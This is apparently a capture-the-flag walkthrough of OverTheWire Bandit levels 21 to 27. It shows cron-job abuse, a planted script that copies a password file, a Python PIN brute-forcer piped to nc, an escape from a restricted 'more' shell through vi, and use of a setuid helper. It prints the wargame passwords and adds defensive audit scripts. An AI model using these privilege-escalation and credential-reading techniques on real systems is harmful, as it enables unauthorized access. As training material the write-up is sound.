Level 21 -> Level 22
- Hint
A program is running automatically at regular intervals from cron, the time-based job scheduler. Look in /etc/cron.d/ for the configuration and see what command is being executed.
- cron
A utility program that lets users schedule commands to run repeatedly at specified times.
min(0-59) | hour(0-23) | day of month(1-31) | month(1-12) | day of week(0-6)(sun-sat) | command
ex) * * * * * bandit22 /usr/bin/cronjob_bandit22.sh &> /dev/null
Runs /usr/bin/cronjob_bandit22.sh every minute with bandit22's privileges.
-> Inspecting /usr/bin/cronjob_bandit22.sh shows that it saves bandit22's password to the file /tmp/t7O6lds9S0RqQh9aMcz6ShpAoZKF7fgv.
bandit21@bandit:~$ ls /etc/cron.d
cronjob_bandit15_root cronjob_bandit22 cronjob_bandit24 e2scrub_all sysstat
cronjob_bandit17_root cronjob_bandit23 cronjob_bandit25_root otw-tmp-dir
bandit21@bandit:~$ cat /etc/cron.d/cronjob_bandit22
@reboot bandit22 /usr/bin/cronjob_bandit22.sh &> /dev/null
* * * * * bandit22 /usr/bin/cronjob_bandit22.sh &> /dev/null
bandit21@bandit:~$ cat /usr/bin/cronjob_bandit22.sh
#!/bin/bash
chmod 644 /tmp/t7O6lds9S0RqQh9aMcz6ShpAoZKF7fgv
cat /etc/bandit_pass/bandit22 > /tmp/t7O6lds9S0RqQh9aMcz6ShpAoZKF7fgv
bandit21@bandit:~$ cat /tmp/t7O6lds9S0RqQh9aMcz6ShpAoZKF7fgv
WdDozAdTM2z9DiFEQ2mGlwngMfj4EZff
WdDozAdTM2z9DiFEQ2mGlwngMfj4EZff
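An added example (not part of the original post): a POSIX shell parser for the /etc/cron.d line format used above, where a user field sits between the schedule and the command, plus a check that flags jobs whose script or containing directory is writable by group or others. The function names are assumptions of this example.

```shell
#!/bin/sh
# Added example; function names are assumptions, not from the original post.

# parse_cron_line LINE
# Prints "schedule|user|command" for a job line in /etc/cron.d format.
# Returns 1 for blank lines, comments, VAR=value lines and truncated lines.
parse_cron_line() {
    set -f; set -- $1; set +f        # split on whitespace, keep "*" literal
    [ $# -gt 0 ] || return 1
    case $1 in
        '#'*|*=*) return 1 ;;
        @*) [ $# -ge 3 ] || return 1; sched=$1; shift ;;
        *)  [ $# -ge 7 ] || return 1; sched="$1 $2 $3 $4 $5"; shift 5 ;;
    esac
    user=$1; shift
    printf '%s|%s|%s\n' "$sched" "$user" "$*"
}

# loose_perms PATH -> true if group or others may write to PATH
loose_perms() {
    case $(ls -ldL -- "$1" 2>/dev/null | cut -c1-10) in
        ?????w*|????????w*) return 0 ;;
    esac
    return 1
}

# audit_cron_file FILE
# Prints "user|script|reason" for each job whose script, or the directory
# holding it, can be modified by someone other than its owner.
audit_cron_file() {
    while IFS= read -r line || [ -n "$line" ]; do
        entry=$(parse_cron_line "$line") || continue
        rest=${entry#*|}; user=${rest%%|*}; cmd=${rest#*|}
        script=${cmd%% *}
        if loose_perms "$script"; then
            echo "$user|$script|script is group/world-writable"
        elif loose_perms "$(dirname -- "$script")"; then
            echo "$user|$script|directory is group/world-writable"
        fi
    done < "$1"
}
```

Run it as `audit_cron_file /etc/cron.d/<file>`; a job listed once per schedule line (for example @reboot and * * * * *) is reported once per line.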
Level 22 -> Level 23
- Hint
A program is running automatically at regular intervals from cron, the time-based job scheduler. Look in /etc/cron.d/ for the configuration and see what command is being executed.
NOTE: Looking at shell scripts written by other people is a very useful skill. The script for this level is intentionally made easy to read. If you are having problems understanding what it does, try executing it to see the debug information it prints.
- Solution
Checking cron shows that it runs /usr/bin/cronjob_bandit23.sh,
and the file's contents show that myname holds the output of the whoami command and mytarget holds the output of the echo pipeline (the MD5 hash of the echoed string).
myname : bandit23 (when run as bandit23)
mytarget : 8ca319486bfbbc3663ea0fbe81326349
The password is stored at /tmp/$mytarget, so reading /tmp/8ca319486bfbbc3663ea0fbe81326349 reveals the password.
bandit22@bandit:~$ ls /etc/cron.d/
cronjob_bandit15_root cronjob_bandit22 cronjob_bandit24 e2scrub_all sysstat
cronjob_bandit17_root cronjob_bandit23 cronjob_bandit25_root otw-tmp-dir
bandit22@bandit:~$ cat /etc/cron.d/cronjob_bandit23
@reboot bandit23 /usr/bin/cronjob_bandit23.sh &> /dev/null
* * * * * bandit23 /usr/bin/cronjob_bandit23.sh &> /dev/null
bandit22@bandit:~$ cat /usr/bin/cronjob_bandit23.sh
#!/bin/bash
myname=$(whoami)
mytarget=$(echo I am user $myname | md5sum | cut -d ' ' -f 1)
echo "Copying passwordfile /etc/bandit_pass/$myname to /tmp/$mytarget"
cat /etc/bandit_pass/$myname > /tmp/$mytarget
bandit22@bandit:~$ whoami
bandit22
bandit22@bandit:~$ echo "I am user bandit23" | md5sum | cut -d ' ' -f 1
8ca319486bfbbc3663ea0fbe81326349
bandit22@bandit:~$ cat /tmp/8ca319486bfbbc3663ea0fbe81326349
QYw0Y2aiA672PsMmh9puTQuhoz8SyR2G
QYw0Y2aiA672PsMmh9puTQuhoz8SyR2G
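An added example (not part of the original post) of why the output files in Level 21 and Level 22 are readable by other users, next to a hardened way to write the same file. The function names are hypothetical, and the weak variant writes into a caller-supplied directory instead of /tmp so that it can be tried safely.

```shell
#!/bin/sh
# Added example; function names are hypothetical, not from the original post.

# target_name USER
# Same derivation as cronjob_bandit23.sh: the name depends only on the
# user name, so every local user can compute it.
target_name() {
    echo I am user "$1" | md5sum | cut -d ' ' -f 1
}

# publish_like_cronjob SOURCE USER DIR
# Weak pattern: predictable name, default umask 022 -> file is rw-r--r--.
publish_like_cronjob() {
    ( umask 022
      out="$3/$(target_name "$2")"
      cat -- "$1" > "$out" || exit 1
      printf '%s\n' "$out" )
}

# publish_secret_privately SOURCE DIR
# Hardened pattern: random name from mktemp, owner-only permissions.
# DIR should be a directory owned by the job's user, not a shared /tmp.
publish_secret_privately() {
    ( umask 077
      out=$(mktemp "$2/secret.XXXXXXXXXX") || exit 1
      cat -- "$1" > "$out" || exit 1
      printf '%s\n' "$out" )
}

# mode_of PATH -> permission string such as -rw-------
mode_of() { ls -ld -- "$1" | cut -c1-10; }
```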
Level 23 -> Level 24
- Hint
A program is running automatically at regular intervals from cron, the time-based job scheduler. Look in /etc/cron.d/ for the configuration and see what command is being executed.
NOTE: This level requires you to create your own first shell-script. This is a very big step and you should be proud of yourself when you beat this level!
NOTE 2: Keep in mind that your shell script is removed once executed, so you may want to keep a copy around…
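- Solution
The /usr/bin/cronjob_bandit24.sh shell script executes the script files in the /var/spool/bandit24/foo directory and deletes each script file once it has run.
cd /var/spool/$myname/foo || exit 1 : Changes into the directory; if that fails, the script exits.
for i in * .*; : Loops over every entry in the current directory, including hidden files.
if [ "$i" != "." -a "$i" != ".." ]; : Processes the entry unless it is the current directory or the parent directory.
if [ "${owner}" = "bandit23" ]; then : Performs the next step only when the file's owner is bandit23.
timeout -s 9 60 ./$i : Runs the script file with a 60-second limit; if it runs too long, it is forcibly terminated with signal 9.
rm -rf ./$i : Deletes the script file.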
bandit23@bandit:/$ cd /etc/cron.d/
bandit23@bandit:/etc/cron.d$ ls
cronjob_bandit15_root cronjob_bandit22 cronjob_bandit24 e2scrub_all sysstat
cronjob_bandit17_root cronjob_bandit23 cronjob_bandit25_root otw-tmp-dir
bandit23@bandit:/etc/cron.d$ cat cronjob_bandit24
@reboot bandit24 /usr/bin/cronjob_bandit24.sh &> /dev/null
* * * * * bandit24 /usr/bin/cronjob_bandit24.sh &> /dev/null
bandit23@bandit:/etc/cron.d$ cat /usr/bin/cronjob_bandit24.sh
#!/bin/bash
myname=$(whoami)
cd /var/spool/$myname/foo || exit 1
echo "Executing and deleting all scripts in /var/spool/$myname/foo:"
for i in * .*;
do
    if [ "$i" != "." -a "$i" != ".." ];
    then
        echo "Handling $i"
        owner="$(stat --format "%U" ./$i)"
        if [ "${owner}" = "bandit23" ]; then
            timeout -s 9 60 ./$i
        fi
        rm -rf ./$i
    fi
done
Write a shell script under the foo directory so that it gets executed.
The shell script should be written so that it reads the bandit24 password.
bandit23@bandit:/var/spool/bandit24/foo$ chmod 777 /tmp/bandit24
bandit23@bandit:/var/spool/bandit24/foo$ vi /tmp/bandit24/exploit.sh
bandit23@bandit:/var/spool/bandit24/foo$ cat /tmp/bandit24/exploit.sh
#! /bin/bash
cat /etc/bandit_pass/bandit24 > /tmp/bandit24/password
bandit23@bandit:/var/spool/bandit24/foo$ cp /tmp/bandit24/exploit.sh ./exploit.sh
bandit23@bandit:/var/spool/bandit24/foo$ chmod 777 ./exploit.sh
bandit23@bandit:/var/spool/bandit24/foo$ cat /tmp/bandit24/password
VAfGXJ1PBSsPSnvsjI8p759leLZ9GGar
bandit23@bandit:/var/spool/bandit24/foo$ cat ./exploit.sh
cat: ./exploit.sh: No such file or directory
- chmod
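A shell script written under the foo directory has no execute permission at first, so its permissions must be changed. (rw-rw-r--)
Other users have no write permission on a directory created under /tmp, so its permissions must be changed so that the password file can be written there. (r-x)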
bandit23@bandit:/var/spool/bandit24/foo$ vi ss.sh
bandit23@bandit:/var/spool/bandit24/foo$ ls -al ss.sh
-rw-rw-r-- 1 bandit23 bandit23 6 Sep 15 04:59 ss.sh
bandit23@bandit:/var/spool/bandit24/foo$ mkdir /tmp/tttt
bandit23@bandit:/var/spool/bandit24/foo$ ls -al /tmp/tttt
total 10560
drwxrwxr-x 2 bandit23 bandit23 4096 Sep 15 05:01 .
drwxrwx-wt 984 root root 10801152 Sep 15 05:02 ..
VAfGXJ1PBSsPSnvsjI8p759leLZ9GGar
Level 24 -> Level 25
- Hint
A daemon is listening on port 30002 and will give you the password for bandit25 if given the password for bandit24 and a secret numeric 4-digit pincode. There is no way to retrieve the pincode except by going through all of the 10000 combinations, called brute-forcing.
You do not need to create new connections each time
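- Solution
Connecting to port 30002 on localhost yields the password for bandit25.
The input to send after connecting is the bandit24 password 'VAfGXJ1PBSsPSnvsjI8p759leLZ9GGar' combined with an arbitrary 4-digit number.
- grep -v option
Prints the lines that do not contain the given pattern.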
- brute force
import multiprocessing

def brute_force_range(start, end):
    # Print one "<bandit24 password> <pin>" line for each PIN in [start, end)
    for i in range(start, end):
        print("VAfGXJ1PBSsPSnvsjI8p759leLZ9GGar " + str(i).zfill(4))

if __name__ == '__main__':
    num_processes = 4  # desired number of parallel processes
    start_value = 0
    end_value = 10000
    step = (end_value - start_value) // num_processes
    processes = []
    for i in range(num_processes):
        start = i * step
        end = (i + 1) * step if i < num_processes - 1 else end_value
        process = multiprocessing.Process(target=brute_force_range, args=(start, end))
        processes.append(process)
        process.start()
    for process in processes:
        process.join()
bandit24@bandit:~$ vi /tmp/bandit25/test.py
bandit24@bandit:~$ python3 /tmp/bandit25/test.py | nc localhost 30002 > /tmp/bandit25/res
bandit24@bandit:~$ cat /tmp/bandit25/res | grep -v "Wrong"
I am the pincode checker for user bandit25. Please enter the password for user bandit24 and the secret pincode on a single line, separated by a space.
Correct!
The password of user bandit25 is p7TaowMYrmu23Ol8hiZh9UvD0O9hpx8d
Exiting.
p7TaowMYrmu23Ol8hiZh9UvD0O9hpx8d
Level 25 -> Level 26
- Hint
Logging in to bandit26 from bandit25 should be fairly easy… The shell for user bandit26 is not /bin/bash, but something else. Find out what it is, how it works and how to break out of it.
- Solution
Connecting over ssh with the private key drops the connection.
Check bandit26's shell -> cat /etc/passwd | grep "bandit26"
bandit26's shell is /usr/bin/showtext -> it displays ~/text.txt
That is why connecting over ssh runs more ~/text.txt.
bandit25@bandit:~$ cat /etc/passwd | grep "bandit26"
bandit26:x:11026:11026:bandit level 26:/home/bandit26:/usr/bin/showtext
bandit25@bandit:~$ cat /usr/bin/showtext
#!/bin/sh
export TERM=linux
exec more ~/text.txt
exit 0
bandit25@bandit:~$ ls
bandit26.sshkey
bandit25@bandit:~$ ssh -i bandit26.ssheky bandit26@bandit.labs.overthewire.org -p 2220
Warning: Identity file bandit26.ssheky not accessible: No such file or directory.
The authenticity of host '[bandit.labs.overthewire.org]:2220 ([127.0.0.1]:2220)' can't be established.
ED25519 key fingerprint is SHA256:C2ihUBV7ihnV1wUXRb4RrEcLfXC5CXlhmAAM/urerLY.
This key is not known by any other names
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Could not create directory '/home/bandit25/.ssh' (Permission denied).
Failed to add the host to the list of known hosts (/home/bandit25/.ssh/known_hosts).
_ _ _ _
| |__ __ _ _ __ __| (_) |_
| '_ \ / _` | '_ \ / _` | | __|
| |_) | (_| | | | | (_| | | |_
|_.__/ \__,_|_| |_|\__,_|_|\__|
This is an OverTheWire game server.
More information on http://www.overthewire.org/wargames
!!! You are trying to log into this SSH server with a password on port 2220 from localhost.
!!! Connecting from localhost is blocked to conserve resources.
!!! Please log out and log in again.
bandit26@bandit.labs.overthewire.org: Permission denied (publickey).
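- more command
A command that shows the contents of a text file one screen at a time.
If you shrink the terminal window before connecting, the more command keeps running, because the text no longer fits on a single screen.
- more command, v option
Launches the vi editor.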
v
Start up an editor at current line. The editor is taken from the
environment variable VISUAL if defined, or EDITOR if VISUAL is not
defined, or defaults to vi(1) if neither VISUAL nor EDITOR is defined.
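The /etc/bandit_pass/bandit26 file can also be read from here, but unless the shell is changed you will only ever see the ~/text.txt screen.
# Fetching the result with vi commands
:r /etc/bandit_pass/bandit26
:e /etc/bandit_pass/bandit26
Commands can be run from inside the vi editor.
The set command can be used to change the shell, which can then be launched.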
Level 26 -> Level 27
- Hint
Good job getting a shell! Now hurry and grab the password for bandit27!
- Solution
The bandit27-do file has the setuid bit set, so it runs with bandit27's privileges and can be used to read the /etc/bandit_pass/bandit27 file.
bandit26@bandit:~$ ls
bandit27-do text.txt
bandit26@bandit:~$ ls -al
total 44
drwxr-xr-x 3 root root 4096 Apr 23 18:04 .
drwxr-xr-x 70 root root 4096 Apr 23 18:05 ..
-rwsr-x--- 1 bandit27 bandit26 14876 Apr 23 18:04 bandit27-do
-rw-r--r-- 1 root root 220 Jan 6 2022 .bash_logout
-rw-r--r-- 1 root root 3771 Jan 6 2022 .bashrc
-rw-r--r-- 1 root root 807 Jan 6 2022 .profile
drwxr-xr-x 2 root root 4096 Apr 23 18:04 .ssh
-rw-r----- 1 bandit26 bandit26 258 Apr 23 18:04 text.txt
bandit26@bandit:~$ ./bandit27-do
Run a command as another user.
Example: ./bandit27-do id
bandit26@bandit:~$ ./bandit27-do id
uid=11026(bandit26) gid=11026(bandit26) euid=11027(bandit27) groups=11026(bandit26)
bandit26@bandit:~$ ./bandit27-do cat /etc/bandit_pass/bandit27
YnQpBuifNMas1hcUFk70ZmqkhUU2EuaS
YnQpBuifNMas1hcUFk70ZmqkhUU2EuaS